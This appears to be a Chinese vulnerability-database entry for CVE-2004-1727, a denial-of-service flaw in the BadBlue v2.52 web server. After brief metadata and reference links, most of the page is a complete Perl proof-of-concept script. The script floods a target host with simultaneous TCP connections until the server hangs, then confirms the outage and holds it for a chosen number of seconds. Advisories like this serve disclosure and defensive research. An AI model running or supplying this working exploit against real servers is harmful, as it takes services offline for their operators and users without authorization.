BadBlue Web Server Service远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108143 漏洞类型 其他
发布时间 2004-08-26 更新时间 2006-08-23
CVE编号 CVE-2004-1727 CNNVD-ID CNNVD-200408-207
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/419
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-207
|漏洞详情
BadBlue是小型WEB服务器程序,提供目录保护功能。BadBlue在处理多连接过程中存在问题,远程攻击者可以利用这个漏洞对目标服务程序进行拒绝服务攻击。远程攻击者在同一主机发送超过24个同步连接,可导致系统挂起,停止任何主机的连接。
|漏洞EXP
#!/usr/bin/perl 
############################################################## 
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code 
############################################################## 
# BadBlue Web Server can not handle many simultaneous connects 
# from the same host, and will lock up until the connects stop 
############################################################## 
# This Proof Of Concept Written By GulfTech Security Research 
############################################################## 

use Strict; 
use Socket; 
use IO::Socket; 

my $host = $ARGV[0]; 
my $port = $ARGV[1]; 
my $stop = $ARGV[2]; 
my $size = 1000; 
my $prot = getprotobyname('tcp'); 
my $slep = $ARGV[3]; 

printf("================================================ "); 
printf(" BadBlue v2.52 Web Server Denial Of Service POC "); 
printf("================================================ "); 
printf("
Making %d Connections To %s ", $stop , $host); 

for ($i=1; $i<$stop; $i++) 
{ 
socket($i, PF_INET, SOCK_STREAM, $prot ); 
my $dest = sockaddr_in ($port, inet_aton($host)); 
connect($i, $dest); 
} 

CheckServer($host, $i, $slep, $stop); 
KillThreads($stop); 
printf("
Exploit Attempt Unsuccesful"); 
exit; 

sub CheckServer($host, $i, $slep, $stop) { 
($host, $i, $slep, $stop) = @_; 
$blank = "1512" x 2; 
$request = "GET / HTTP/1.0".$blank; 
$remote = IO::Socket::INET->new( Proto => "tcp", 
PeerAddr => $host, 
PeerPort => $port, 
Timeout => '10000', 
Type => SOCK_STREAM, 
); 
print $remote $request; 
unless ( <$remote> ) 
{ 
printf("
Host %s Has Been Successfully DoS'ed ", $host); 
printf("
The Host Will Be Down For %d Seconds ", $slep); 
sleep($slep); 
KillThreads($stop); 
exit; 
} 
} 

sub KillThreads($stop) { 
$stop = @_; 
printf("
Killing All active Connections"); 
for ($l=1; $l<$stop; $l++) { 
shutdown($l,2)|| die("Couldn't Shut Down Socket"); 
$l++; 
} 
} 

# milw0rm.com [2004-08-26]
|参考资料

来源:XF
名称:badblue-mult-connection-dos(17064)
链接:http://xforce.iss.net/xforce/xfdb/17064
来源:BID
名称:10983
链接:http://www.securityfocus.com/bid/10983
来源:www.gulftech.org
链接:http://www.gulftech.org/?node=research&article_id=00043-08202004
来源:SECUNIA
名称:12346
链接:http://secunia.com/advisories/12346
来源:BUGTRAQ
名称:20040820BadBlueWebserverv2.5DenialOfServiceVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109309119502208&w=2